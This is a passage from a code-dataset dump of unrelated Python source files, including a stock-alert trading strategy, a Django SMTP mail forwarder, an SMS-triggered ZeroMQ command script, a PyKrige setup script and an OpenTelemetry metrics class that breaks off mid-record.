args=[request.user.budget_set.all()[0].pk]))","sub_path":"ynab/budget/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"474800467","text":"# Copyright (C) 2018 Hatching B.V.\n# This file is licensed under the MIT License, see also LICENSE.\n\nimport hashlib\n\nfrom arbiter.ipfs import ipfs_open\n\nclass Artifact(object):\n def __init__(self, id, name, hash, url):\n self.id = id\n self.name = name\n self.hash = hash\n self.url = url\n self._sha256 = None\n\n def fetch(self):\n return ipfs_open(self.hash)\n\n def sha256(self):\n if not self._sha256:\n s = hashlib.sha256()\n with self.fetch() as fp:\n while True:\n tmp = fp.read(4096)\n if not tmp:\n break\n s.update(tmp)\n self._sha256 = s.hexdigest()\n return self._sha256\n","sub_path":"arbiter/artifacts.py","file_name":"artifacts.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"209978624","text":"import tushare as ts\nimport requests\nimport json\nimport time\nfrom eventlet.greenpool import GreenPool\nfrom datetime import datetime, timedelta\nfrom easyquant import StrategyTemplate\nfrom easyquant.policy.manager import Manager\nfrom easyquant.easydealutils.time import previous_trade_date_from_now\nfrom easyquant.utils.utils import get_all_stock_codes\nfrom oslo_config import cfg\nfrom datetime import datetime\n\nopts = [\n cfg.StrOpt(\"alert_post_url\",\n help=\"alert post url\"),\n cfg.StrOpt(\"policy_post_url\",\n help=\"Policy post url\"),\n cfg.StrOpt(\"stock_owner_username\",\n help=\"Username used to get stocks for stop loss indicator\"),\n cfg.StrOpt(\"stock_owner_password\",\n help=\"Password used to get stocks for stop loss indicator\"),\n cfg.StrOpt(\"login_url\",\n help=\"login url to get stocks\"),\n cfg.StrOpt(\"query_stocks_url\",\n help=\"query url to get stocks\"),\n cfg.StrOpt(\"query_stocks_url\",\n help=\"query url to get stocks\"),\n cfg.StrOpt(\"statistics_post_url\",\n help=\"statistics post url\"),\n]\n\nCONF = cfg.CONF\nCONF.register_opts(opts)\n\nclass Strategy(StrategyTemplate):\n\n def __init__(self, user, log_handler, main_engine):\n super(Strategy, self).__init__(user, log_handler, main_engine)\n self.manager = Manager()\n self.define_indicators()\n self.define_get_val_funcs()\n self.define_rules()\n self.define_policies()\n self.policy_post_url = CONF.policy_post_url\n self.alert_post_url = CONF.alert_post_url\n self.statistics_post_url = CONF.statistics_post_url\n self.priority = 1\n\n def get_stocks_for_stop_loss_indicator(self):\n while True:\n try:\n s = requests.Session()\n # first login\n s.post(CONF.login_url, data={'user': CONF.stock_owner_username,\n 'password':\n CONF.stock_owner_password})\n r = s.get(CONF.query_stocks_url)\n break\n except Exception as e:\n print(\"Error: %s\" % str(e))\n time.sleep(60)\n\n # query stocks\n if r.status_code == 500:\n return []\n return json.loads(r.text)\n\n @staticmethod\n def get_hist_data(code):\n start_date = previous_trade_date_from_now(65)\n end_date = datetime.now() - timedelta(days=1)\n strstart = start_date.strftime('%Y-%m-%d')\n strend = end_date.strftime('%Y-%m-%d')\n hist = ts.get_hist_data(code, start=strstart, end=strend)\n return hist\n\n def run_before_strategy(self):\n if self.manager.load_indicators():\n self.log.info(\"All indicators loaded successfully\")\n return\n self.manager.reset()\n 
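# --- Hedged aside: Artifact.sha256() above streams the file through
# hashlib in 4 KiB chunks and caches the hex digest; the same streaming
# pattern over any binary file-like object, via iter() with a sentinel:
import hashlib

def stream_sha256(fp, chunk_size=4096):
    digest = hashlib.sha256()
    for chunk in iter(lambda: fp.read(chunk_size), b''):
        digest.update(chunk)
    return digest.hexdigest()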
self.create_stop_loss_price_indicator()\n self.define_user_stocks_rule()\n start_time = datetime.now()\n stock_codes = get_all_stock_codes(True)\n gp = GreenPool()\n for code in stock_codes:\n if code[0: 2] not in ['00', '60', '30']:\n continue\n gp.spawn(self.manager.prepare,\n code, Strategy.get_hist_data)\n gp.waitall()\n self.manager.save()\n self.log.info(\"rub_before_strategy completed. Start from %s\"\n % start_time.strftime(\"%Y-%m-%d %H:%M\"))\n\n def strategy(self, event):\n result = self.manager.run(event.data)\n updated = False\n for policy, data in result.items():\n if data['updated'] and self.policy_post_url:\n updated = True\n if self.manager.get_policy(policy).alert and \\\n data['updated']:\n alert_contents = []\n for key in data['updated']:\n data['result'][key]['code'] = key\n alert_contents.append(data['result'][key])\n action = \"sell\" if policy in \\\n [\"stoploss\", \"sell_when_ma20btnow\" ] else \"buy\"\n send_data = {'type': 'stock',\n 'priority':\n self.manager.get_policy(policy).priority,\n 'data': {'stocks': alert_contents,\n 'action': action,\n 'system': policy}}\n self.log.info(\"New alert for policy %s\" % policy)\n\n requests.post(self.alert_post_url,\n json = send_data)\n data.pop('updated')\n\n if updated:\n requests.post(self.policy_post_url,\n json = result)\n\n def define_indicators(self):\n self.manager.indicator_create('edge_cls', name='highest_20',\n column='high', days=20)\n self.manager.indicator_create('edge_cls', name='highest_30',\n column='high', days=30)\n self.manager.indicator_create('edge_cls', name='highest_60',\n column='high', days=60)\n self.manager.indicator_create('cv_cls', name='cv_20', column='close',\n days=20)\n self.manager.indicator_create('cv_cls', name='cv_60', column='close',\n days=60)\n\n self.manager.indicator_create(\"continuouse_red_days_cls\",\n name='redday_60',\n expected_continuous_days=5,\n days=60)\n self.manager.indicator_create(\"yesterday_updown_stock_count_cls\",\n name='updown')\n self.manager.indicator_create(\"today_updown_stock_count_cls\",\n name='today_updown')\n self.manager.indicator_create(\"continuous_big_red_days_cls\",\n expected_continuous_days=4,\n name='big_redday_60')\n self.manager.indicator_create(\"volume_mean_cls\",\n name='volume_mean')\n\n self.create_stop_loss_price_indicator()\n self.manager.indicator_create(\n \"latest_trade_day_ma20_less_than_ma5_cls\",\n name='ma20ltma5')\n self.manager.indicator_create(\n \"latest_trade_day_ma20_cls\",\n name='ma20')\n\n def create_stop_loss_price_indicator(self):\n stocks = self.get_stocks_for_stop_loss_indicator()\n code_price_dict = {}\n for stock in stocks:\n code_price_dict[stock[\"code\"]] = stock[\"stop_loss_price\"]\n self.log.info(\"Creating stop loss price indicator for \"\n \"stocks: %s\" % code_price_dict)\n self.manager.indicator_create(\"stop_loss_price_cls\",\n name='stoploss',\n code_stoplossprice_dict=code_price_dict)\n\n def define_get_val_funcs(self):\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_500',\n 500)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_2',\n 2)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_1',\n 1)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_8',\n 8)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_10',\n 10)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_30',\n 30)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_True',\n True)\n self.manager.get_val_func_create('get_fixed_value_func', 
'fix_False',\n False)\n self.manager.get_val_func_create('get_value_by_key_func', 'key_now',\n 'now')\n self.manager.get_val_func_create('get_value_by_key_func',\n 'key_turnover', 'turnover')\n self.manager.get_val_func_create('get_value_by_key_ignore_zero_func',\n 'key_now_ignore_zero',\n 'now')\n\n def define_user_stocks_rule(self):\n stocks = self.get_stocks_for_stop_loss_indicator()\n codes = [s[\"code\"] for s in stocks]\n self.manager.selectedcodesrule_create('user_stocks_rule', codes)\n\n def define_rules(self):\n self.manager.rule_create('highest_20_rule', \"key_now\", '>',\n 'highest_20')\n self.manager.rule_create('highest_60_rule', \"key_now\", '>',\n 'highest_60')\n self.manager.rule_create('highest_30_rule', \"key_now\", '>',\n 'highest_30')\n self.manager.rule_create('cv_20_rule', \"fix_500\", '>',\n 'cv_20')\n self.manager.rule_create('cv_20_strict_rule', \"fix_2\", '>',\n 'cv_20')\n self.manager.rule_create('cv_60_rule', \"fix_500\", '>',\n 'cv_60')\n self.manager.rule_create('cv_60_strict_rule', \"fix_2\", '>',\n 'cv_60')\n self.manager.rule_create('cv_60_lt_10_rule', \"fix_10\", '>',\n 'cv_60')\n self.manager.rule_create('redday_60_rule', \"fix_1\", '<',\n 'redday_60')\n self.manager.rule_create('big_redday_60_rule', \"fix_1\", '<',\n 'big_redday_60')\n\n self.manager.rule_create('stop_loss_price_rule', \"key_now_ignore_zero\",\n '<', 'stoploss')\n self.manager.rule_create('today_updown_stocks_rule', \"fix_30\",\n '<', 'today_updown')\n self.manager.rule_create('ma20ltma5_true_rule',\n 'fix_True', '=', 'ma20ltma5')\n self.manager.rule_create('ma20ltma5_false_rule',\n 'fix_False', '=', 'ma20ltma5')\n self.manager.rule_create('now_lt_ma20_rule',\n 'key_now', '<', 'ma20')\n self.manager.rule_create('volume_bt_4Xvmean_rule',\n 'key_turnover', '>', 'volume_mean')\n\n self.define_user_stocks_rule()\n self.manager.topprofitstockrule_create('top_profit_ratio_rule')\n\n\n def define_policies(self):\n\n self.manager.policy_create('system1-500cv',\n ['highest_20_rule',\n 'today_updown_stocks_rule',\n 'cv_20_rule'])\n\n self.manager.policy_create('system2-500cv',\n ['highest_60_rule',\n 'today_updown_stocks_rule',\n 'cv_60_rule'])\n\n self.manager.policy_create('system1-2cv', ['highest_20_rule',\n 'redday_60_rule',\n 'cv_20_strict_rule',\n 'ma20ltma5_true_rule',\n 'today_updown_stocks_rule'],\n alert=True)\n\n self.manager.policy_create('system2-2cv', ['highest_60_rule',\n 'redday_60_rule',\n 'cv_60_strict_rule',\n 'ma20ltma5_true_rule',\n 'today_updown_stocks_rule'],\n alert=True, priority=2)\n\n self.manager.policy_create('fjj', ['redday_60_rule'])\n self.manager.policy_create('stoploss', ['stop_loss_price_rule'],\n alert=True, priority=2)\n self.manager.policy_create('sell_when_ma20btnow',\n ['user_stocks_rule',\n 'now_lt_ma20_rule'],\n alert=True, priority=2)\n\n self.manager.policy_create('bigreddays-10cv-30break',\n ['highest_30_rule',\n 'cv_60_lt_10_rule',\n 'big_redday_60_rule',\n 'ma20ltma5_true_rule',\n 'volume_bt_4Xvmean_rule',\n 'today_updown_stocks_rule'],\n priority=1, alert=True)\n self.manager.policy_create('topprofit',\n ['top_profit_ratio_rule'])\n\n def push_statistics(self):\n try:\n result = self.manager.get_indicator_results(\"today_updown\",\n 'market')\n send_data={'update_time': datetime.now().strftime(\"%m-%d %H:%M\")}\n send_data[\"today_updown\"] = result\n requests.post(self.statistics_post_url,\n json=send_data)\n except Exception:\n self.log.info(\"push statistics error\")\n\n def clock(self, event):\n if event.data.clock_event == 'open':\n # 开市了\n 
self.log.info('open')\n elif event.data.clock_event == 'close':\n # 收市了\n self.log.info('close')\n elif event.data.clock_event == 5:\n # 5 分钟的 clock\n self.log.info(\"5分钟\")\n self.push_statistics()\n elif event.data.clock_event == 30:\n self.log.info(\"30分钟\")\n elif event.data.clock_event == 'newday':\n self.log.info(\"%s newday\" % self.name)\n self.reload()\n\n def shutdown(self):\n \"\"\"\n 关闭进程前调用该函数\n :return:\n \"\"\"\n if self._initing:\n self.manager.save()\n","sub_path":"strategies/policystrategy.py","file_name":"policystrategy.py","file_ext":"py","file_size_in_byte":14262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"539309955","text":"# encoding: utf8\nimport datetime\nimport email.utils\nimport itertools\nimport json\nimport os\nimport re\nimport sys\nimport textwrap\nimport traceback\n\nfrom emailtunnel import SMTPForwarder, Message, InvalidRecipient, logger\nfrom emailtunnel.mailhole import MailholeRelayMixin\n\nfrom django.db import connection\nfrom django.conf import settings\n\nfrom mftutor.aliases.models import resolve_alias\nfrom mftutor.tutor.models import Tutor, TutorGroup, RusClass, Rus\n\n\ndef abbreviate_recipient_list(recipients):\n if all('@' in rcpt for rcpt in recipients):\n parts = [rcpt.split('@', 1) for rcpt in recipients]\n parts.sort(key=lambda x: (x[1].lower(), x[0].lower()))\n by_domain = [\n (domain, [a[0] for a in aa])\n for domain, aa in itertools.groupby(\n parts, key=lambda x: x[1])\n ]\n return ', '.join(\n '<%s@%s>' % (','.join(aa), domain)\n for domain, aa in by_domain)\n else:\n return ', '.join('<%s>' % x for x in recipients)\n\n\ndef now_string():\n \"\"\"Return the current date and time as a string.\"\"\"\n return datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S.%f\")\n\n\nclass ForwardToAdmin(Exception):\n pass\n\n\ndef get_tutorprofile_email(tp):\n # Avoid blacklisting by relaying through @post.au.dk addresses.\n # valid_studentnumber = re.match(r'^201\\d+$', tp.studentnumber)\n # if tp.email.endswith('@gmail.com') and valid_studentnumber:\n # return '%s@post.au.dk' % tp.studentnumber\n return tp.email\n\n\nclass TutorForwarder(SMTPForwarder, MailholeRelayMixin):\n REWRITE_FROM = True\n STRIP_HTML = True\n\n MAIL_FROM = 'admin@TAAGEKAMMERET.dk'\n\n ERROR_TEMPLATE = \"\"\"\n Nedenstående email blev ikke leveret til nogen.\n\n {reason}\n\n {message}\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.gf_year = kwargs.pop('gf_year', None)\n self.tutor_year = kwargs.pop('tutor_year', None)\n self.rus_year = kwargs.pop('rus_year', None)\n\n years = (self.gf_year, self.tutor_year, self.rus_year)\n if all(years):\n self.year_log = (\"Year from kwargs: (%s, %s, %s)\" %\n (self.gf_year, self.tutor_year, self.rus_year))\n else:\n if any(years):\n logger.error(\"must specify all of gf_year, tutor_year, \" +\n \"rus_year or none of them\")\n self.gf_year = settings.YEAR\n self.tutor_year = settings.TUTORMAIL_YEAR\n self.rus_year = settings.RUSMAIL_YEAR\n self.year_log = (\"Year from mftutor.settings: (%s, %s, %s)\" %\n (self.gf_year, self.tutor_year, self.rus_year))\n\n self.gf_groups = kwargs.pop(\n 'gf_groups', settings.GF_GROUPS)\n self.rusclass_base = kwargs.pop(\n 'rusclass_base', settings.RUSCLASS_BASE)\n super(TutorForwarder, self).__init__(*args, **kwargs)\n\n self.exceptions = set()\n\n def should_mailhole(self, message, recipient, sender):\n # Send everything to mailhole\n return True\n\n def startup_log(self):\n logger.info('TutorForwarder listening on %s:%s, ' +\n 
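# --- Hedged aside: a quick illustration of abbreviate_recipient_list()
# above -- addresses are sorted, grouped by domain, and folded into one
# bracket per domain:
# >>> abbreviate_recipient_list(['a@x.dk', 'b@x.dk', 'c@y.dk'])
# '<a,b@x.dk>, <c@y.dk>'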
'relaying to mailhole. %s',\n self.host, self.port, self.year_log)\n\n def reject(self, envelope):\n if envelope.mailfrom == '<>':\n # RFC 5321, 4.5.5. Messages with a Null Reverse-Path:\n # \"[Automated email processors] SHOULD NOT reply to messages\n # with a null reverse-path, and they SHOULD NOT add a non-null\n # reverse-path, or change a null reverse-path to a non-null one,\n # to such messages when forwarding.\"\n # Since we would forward this message with a non-null reverse-path,\n # we should reject it instead.\n return True\n rcpttos = tuple(r.lower() for r in envelope.rcpttos)\n subject = str(envelope.message.subject)\n return (rcpttos == ('webfar@matfystutor.dk',)\n and ('Delayed Mail' in subject\n or 'Undelivered Mail Returned to Sender' in subject))\n\n def handle_envelope(self, envelope, peer):\n try:\n if self.reject(envelope):\n description = summary = 'Rejected due to reject()'\n self.store_failed_envelope(envelope, description, summary)\n return\n return super(TutorForwarder, self).handle_envelope(envelope, peer)\n except ForwardToAdmin as e:\n self.forward_to_admin(envelope, e.args[0])\n finally:\n connection.close()\n\n def forward(self, original_envelope, message, recipients, sender):\n if self.REWRITE_FROM:\n del message.message[\"DKIM-Signature\"]\n orig_from = message.get_header(\"From\")\n parsed = email.utils.getaddresses([orig_from])\n orig_name = parsed[0][0]\n name = \"%s via matfystutor\" % orig_name\n addr = \"webfar@matfystutor.dk\"\n new_from = email.utils.formataddr((name, addr))\n message.set_unique_header(\"From\", new_from)\n message.set_unique_header(\"Reply-To\", orig_from)\n if self.STRIP_HTML:\n from emailtunnel.extract_text import get_body_text\n\n del message.message[\"DKIM-Signature\"]\n t = get_body_text(message.message)\n message.set_unique_header(\"Content-Type\", \"text/plain\")\n del message.message[\"Content-Transfer-Encoding\"]\n charset = email.charset.Charset(\"utf-8\")\n charset.header_encoding = charset.body_encoding = email.charset.QP\n message.message.set_payload(t, charset=charset)\n\n super().forward(original_envelope, message, recipients, sender)\n\n def get_envelope_mailfrom(self, envelope):\n return self.MAIL_FROM.lower()\n\n def translate_recipient(self, rcptto):\n name, domain = rcptto.split('@')\n if name == 'alle':\n raise ForwardToAdmin('Mail til alle')\n if name == 'wiki':\n raise InvalidRecipient(name)\n if name == 'ravtest':\n return ['mathiasrav@outlook.dk']\n groups = self.get_groups(name)\n if groups:\n emails = []\n if any(g[0].handle == 'best' for g in groups):\n emails.append('matfys.udd.nat@au.dk')\n groups = [g for g in groups if g[0].handle != 'best']\n emails += self.get_group_emails(name, groups)\n if not emails:\n raise ForwardToAdmin('Grupper er tomme: %r' % (groups,))\n return emails\n\n tutors_only, rusclasses = self.get_rusclasses(name)\n if rusclasses is not None:\n emails = self.get_rusclass_emails(tutors_only, rusclasses)\n if not emails:\n raise ForwardToAdmin('Ingen tutor/rus-modtagere: %r' %\n (groups,))\n return emails\n\n raise InvalidRecipient(name)\n\n def get_groups(self, recipient):\n \"\"\"Get all TutorGroups that an alias refers to.\"\"\"\n try:\n group_names = resolve_alias(recipient)\n except Exception:\n logger.exception(\"resolve_alias raised an exception - \" +\n \"reconnecting to the database and trying again\")\n # https://code.djangoproject.com/ticket/21597#comment:29\n connection.close()\n group_names = resolve_alias(recipient)\n groups = []\n for name in group_names:\n 
group_and_year = self.get_group(name)\n if group_and_year is not None:\n groups.append(group_and_year)\n return groups\n\n def get_group(self, group_name):\n \"\"\"Resolves a concrete group name to a (group, year)-tuple.\n\n Returns None if the group name is invalid,\n or a tuple (group, year) where group is a TutorGroup\n and year is the year to find the tutors in.\n \"\"\"\n\n # Find the year\n group_name = group_name.lower()\n if group_name in self.gf_groups:\n year = self.gf_year\n elif group_name.startswith('g') and group_name[1:] in self.gf_groups:\n year = self.gf_year - 1\n group_name = group_name[1:]\n else:\n year = self.tutor_year\n\n # Is name a tutorgroup?\n try:\n group = TutorGroup.objects.get(handle=group_name, year=year)\n except TutorGroup.DoesNotExist:\n return None\n\n # Disallow 'alle'\n if group.handle == 'alle':\n return None\n\n return (group, year)\n\n def get_group_emails(self, name, groups):\n emails = []\n for group, year in groups:\n # TODO: After TutorGroup has a year field, this year-filter is\n # perhaps unwanted/unnecessary.\n group_tutors = Tutor.objects.filter(\n groups=group, year=year,\n early_termination__isnull=True)\n group_emails = [get_tutorprofile_email(tutor.profile) for tutor in group_tutors]\n emails += [email for email in group_emails\n if email is not None]\n\n # Remove duplicate email addresses\n return sorted(set(emails))\n\n def get_rusclasses(self, recipient):\n \"\"\"(tutors_only, list of RusClass)\"\"\"\n year = self.rus_year\n\n tutors_only_prefix = 'tutor+'\n if recipient.startswith(tutors_only_prefix):\n recipient = recipient[len(tutors_only_prefix):]\n tutors_only = True\n else:\n tutors_only = False\n\n rusclasses = None\n\n for official, handle, internal in self.rusclass_base:\n if recipient == handle:\n rusclasses = list(RusClass.objects.filter(\n year=year,\n handle__startswith=recipient))\n\n if rusclasses is None:\n try:\n rusclasses = [RusClass.objects.get(year=year, handle=recipient)]\n except RusClass.DoesNotExist:\n pass\n\n return (tutors_only, rusclasses)\n\n def get_rusclass_emails(self, tutors_only, rusclasses):\n tutor_emails = [\n get_tutorprofile_email(tutor.profile)\n for tutor in Tutor.objects.filter(rusclass__in=rusclasses)\n ]\n if tutors_only:\n rus_emails = []\n else:\n rus_emails = [\n get_tutorprofile_email(rus.profile)\n for rus in Rus.objects.filter(rusclass__in=rusclasses)\n ]\n\n emails = tutor_emails + rus_emails\n\n return sorted(set(email for email in emails if email))\n\n def log_receipt(self, peer, envelope):\n mailfrom = envelope.mailfrom\n rcpttos = envelope.rcpttos\n message = envelope.message\n\n if type(mailfrom) == str:\n sender = '<%s>' % mailfrom\n else:\n sender = repr(mailfrom)\n\n if type(rcpttos) == list and all(type(x) == str for x in rcpttos):\n recipients = ', '.join('<%s>' % x for x in rcpttos)\n else:\n recipients = repr(rcpttos)\n\n logger.info(\"Subject: %r From: %s To: %s\",\n str(message.subject), sender, recipients)\n\n def log_delivery(self, message, recipients, sender):\n recipients_string = abbreviate_recipient_list(recipients)\n logger.info('Subject: %r To: %s',\n str(message.subject), recipients_string)\n\n def handle_invalid_recipient(self, envelope, exn):\n self.store_failed_envelope(\n envelope, str(exn), 'Invalid recipient: %s' % exn)\n\n def handle_error(self, envelope, str_data):\n exc_value = sys.exc_info()[1]\n exc_typename = type(exc_value).__name__\n filename, line, function, text = traceback.extract_tb(\n sys.exc_info()[2])[0]\n\n tb = 
''.join(traceback.format_exc())\n if envelope:\n self.store_failed_envelope(\n envelope, str(tb),\n '%s: %s' % (exc_typename, exc_value))\n\n exc_key = (filename, line, exc_typename)\n\n if exc_key not in self.exceptions:\n self.exceptions.add(exc_key)\n self.forward_to_admin(envelope, tb)\n\n def forward_to_admin(self, envelope, reason):\n admin_emails = ['mathiasrav@gmail.com']\n sender = recipient = 'webfar@matfystutor.dk'\n\n subject = '[TutorForwarder] %s' % (reason[:50],)\n body = textwrap.dedent(self.ERROR_TEMPLATE).format(\n reason=reason, message=envelope.message)\n admin_message = Message.compose(\n sender, recipient, subject, body)\n admin_message.add_header('Auto-Submitted', 'auto-replied')\n self.deliver(admin_message, admin_emails, sender)\n\n def store_failed_envelope(self, envelope, description, summary):\n now = now_string()\n\n try:\n os.mkdir('error')\n except OSError:\n pass\n\n with open('error/%s.mail' % now, 'wb') as fp:\n fp.write(envelope.message.as_bytes())\n\n with open('error/%s.json' % now, 'w') as fp:\n metadata = {\n 'mailfrom': envelope.mailfrom,\n 'rcpttos': envelope.rcpttos,\n 'subject': str(envelope.message.subject),\n 'date': envelope.message.get_header('Date'),\n 'summary': summary,\n }\n json.dump(metadata, fp)\n\n with open('error/%s.txt' % now, 'w') as fp:\n fp.write('From %s\\n' % envelope.mailfrom)\n fp.write('To %s\\n\\n' % envelope.rcpttos)\n fp.write('%s\\n' % description)\n fp.write(str(envelope.message))\n","sub_path":"tutormail/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":13631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"268685737","text":"import logging\nfrom time import sleep\nfrom serial import Serial\nfrom sim_900 import Sim900a\nfrom zmq_serv import ZmqSev\n\n# -*-*config*-*-\nwork_ip = '0.0.0.0' # Принемать конекты с ip\nport = '18735'\nchannel = 'sms' # Канал для отправки сообщений\ncommand_in_channel = 'power off' # Каманда каторую отправит серв в канал если условие вернно\nsim_seria = r'/dev/serial0' # uart(com) к модулю\ntrigger = \"sms['text'] in b'off'\" # Условие для отправки command_in_channel\n# -*-*config*-*-\n\n\nlogging.basicConfig(level=logging.DEBUG,\n format='{levelname}[{asctime}]({name})[{processName}:{threadName}:{funcName}] {message}',\n style='{',\n datefmt='%d.%m.%y %H:%M:%S',\n )\n\nlog = logging.getLogger('main')\n\ngsm = Sim900a(serial=Serial(port=sim_seria, baudrate=9600, timeout=2),log=log.getChild('gsm'))\nnod = ZmqSev(ip=work_ip, port=port, log=log.getChild('nod'))\n\nwhile True:\n sms_s = gsm.get_all_sms()\n if not sms_s: # Если новых сообщений нету то след. 
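# --- Hedged aside: the GSM polling loop here eval()'s the configured
# trigger string against each sms dict, which executes arbitrary config
# text. A plain predicate avoids eval while keeping the exact condition
# from the config block above (sketch only):
def trigger_matches(sms):
    return sms['text'] in b'off'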
итерация\n sleep(1)\n continue\n\n for sms in sms_s:\n if eval(trigger):\n nod.send_channel(channel, command_in_channel)\n log.warning(f\"Отправил команду..{[channel.encode(), command_in_channel.encode()]} sms {sms} условие {trigger}\")\n\n gsm.del_sms(sms['index'].decode()[-1].encode())\n log.debug(f'Удаляю sms {sms}')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504173122","text":"import sys\r\nfrom setuptools import setup, Extension\r\nfrom Cython.Distutils import build_ext\r\nfrom os.path import join\r\nimport numpy as np\r\n\r\nimport Cython.Compiler.Options\r\n\r\nCython.Compiler.Options.annotate = False\r\n\r\nif sys.platform != 'win32':\r\n compile_args = dict( extra_compile_args=['-O2', '-march=core2', '-mtune=corei7'],\r\n extra_link_args=['-O2', '-march=core2', '-mtune=corei7'])\r\nelse:\r\n compile_args = {}\r\n\r\n\r\next_modules = [Extension(\"pykrige.lib.cok\",\r\n [\"pykrige/lib/cok.pyx\"],\r\n **compile_args),\r\n Extension(\"pykrige.lib.lapack\",\r\n [\"pykrige/lib/lapack.pyx\"],\r\n **compile_args),\r\n Extension(\"pykrige.lib.variogram_models\",\r\n [\"pykrige/lib/variogram_models.pyx\"],\r\n **compile_args),]\r\n\r\nclass build_ext_compiler_check(build_ext):\r\n def build_extensions(self):\r\n compiler = self.compiler\r\n if sys.platform != 'win32':\r\n build_ext.build_extensions(self)\r\n else:\r\n print(\"Warning: the C extensions will not be built since the compiler could not be found.\\n\"\\\r\n \"See https://github.com/bsmurphy/PyKrige/issues/8 \")\r\n\r\nsetup(name='PyKrige',\r\n version='1.2.0',\r\n author='Benjamin S. Murphy',\r\n author_email='bscott.murphy@gmail.com',\r\n url='https://github.com/bsmurphy/PyKrige',\r\n description='Kriging Toolkit for Python',\r\n long_description='PyKrige is a kriging toolkit for Python that supports \\\r\n two- and three-dimensional ordinary and universal kriging.',\r\n packages=['pykrige'],\r\n package_data={'pykrige': ['README.md', 'CHANGELOG.md', 'LICENSE.txt', 'MANIFEST.in',\r\n join('test_data', '*.txt'), join('test_data', '*.asc')]},\r\n requires=['numpy', 'scipy', 'matplotlib', 'Cython'],\r\n classifiers=['Development Status :: 5 - Production/Stable',\r\n 'Intended Audience :: Science/Research',\r\n 'License :: OSI Approved :: BSD License',\r\n 'Programming Language :: Python',\r\n 'Topic :: Scientific/Engineering',\r\n 'Topic :: Scientific/Engineering :: GIS'],\r\n ext_modules=ext_modules,\r\n include_dirs=[np.get_include()],\r\n cmdclass={'build_ext': build_ext_compiler_check}, #build_ext},\r\n )\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"498525415","text":"import logging\nimport logging.config\nimport os.path\n\nimport yaml\n\nfrom omnibot import settings\n\n\ntry:\n with open(settings.LOG_CONFIG_FILE, \"r\") as fd:\n logging.info('Configuring logger from file')\n logconfig = yaml.safe_load(os.path.expandvars(fd.read()))\n logging.config.dictConfig(logconfig)\nexcept FileNotFoundError:\n logging.warning(\n f'{settings.LOG_CONFIG_FILE} not found; skipping logging configuration'\n )\nexcept Exception:\n logging.exception(\n f'Failed to load {settings.LOG_CONFIG_FILE}; skipping logging configuration'\n 
)\n","sub_path":"omnibot/setup_logging.py","file_name":"setup_logging.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"622464956","text":"# Copyright The OpenTelemetry Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom logging import getLogger\nfrom threading import Lock\nfrom typing import TYPE_CHECKING, Dict, Iterable\n\nfrom opentelemetry.sdk._metrics.aggregation import (\n _Aggregation,\n _convert_aggregation_temporality,\n _PointVarT,\n)\nfrom opentelemetry.sdk._metrics.measurement import Measurement\nfrom opentelemetry.sdk._metrics.point import AggregationTemporality, Metric\nfrom opentelemetry.sdk._metrics.sdk_configuration import SdkConfiguration\nfrom opentelemetry.sdk._metrics.view import View\n\nif TYPE_CHECKING:\n from opentelemetry.sdk._metrics.instrument import _Instrument\n\n_logger = getLogger(__name__)\n\n\nclass _ViewInstrumentMatch:\n def __init__(\n self,\n view: View,\n instrument: \"_Instrument\",\n sdk_config: SdkConfiguration,\n ):\n self._view = view\n self._instrument = instrument\n self._sdk_config = sdk_config\n self._attributes_aggregation: Dict[frozenset, _Aggregation] = {}\n self._attributes_previous_point: Dict[frozenset, _PointVarT] = {}\n self._lock = Lock()\n\n # pylint: disable=protected-access\n def consume_measurement(self, measurement: Measurement) -> None:\n\n if self._view._attribute_keys is not None:\n\n attributes = {}\n\n for key, value in (measurement.attributes or {}).items():\n if key in self._view._attribute_keys:\n attributes[key] = value\n elif measurement.attributes is not None:\n attributes = measurement.attributes\n else:\n attributes = {}\n\n attributes = frozenset(attributes.items())\n\n if attributes not in self._attributes_aggregation:\n with self._lock:\n if attributes not in self._attributes_aggregation:\n self._attributes_aggregation[\n attributes\n ] = self._view._aggregation._create_aggregation(\n self._instrument\n )\n\n self._attributes_aggregation[attributes].aggregate(measurement)\n\n def collect(self, temporality: int) -> Iterable[Metric]:\n\n with self._lock:\n for (\n attributes,\n aggregation,\n ) in self._attributes_aggregation.items():\n\n previous_point = self._attributes_previous_point.get(\n attributes\n )\n\n current_point = aggregation.collect()\n\n # pylint: disable=assignment-from-none\n self._attributes_previous_point[\n attributes\n ] = _convert_aggregation_temporality(\n previous_point,\n current_point,\n AggregationTemporality.CUMULATIVE,\n )\n\n if current_point is not None:\n\n yield Metric(\n attributes=dict(attributes),\n description=(\n self._view._description\n or self._instrument.description\n ),\n instrumentation_info=self._instrument.instrumentation_info,\n name=self._view._name or self._instrument.name,\n 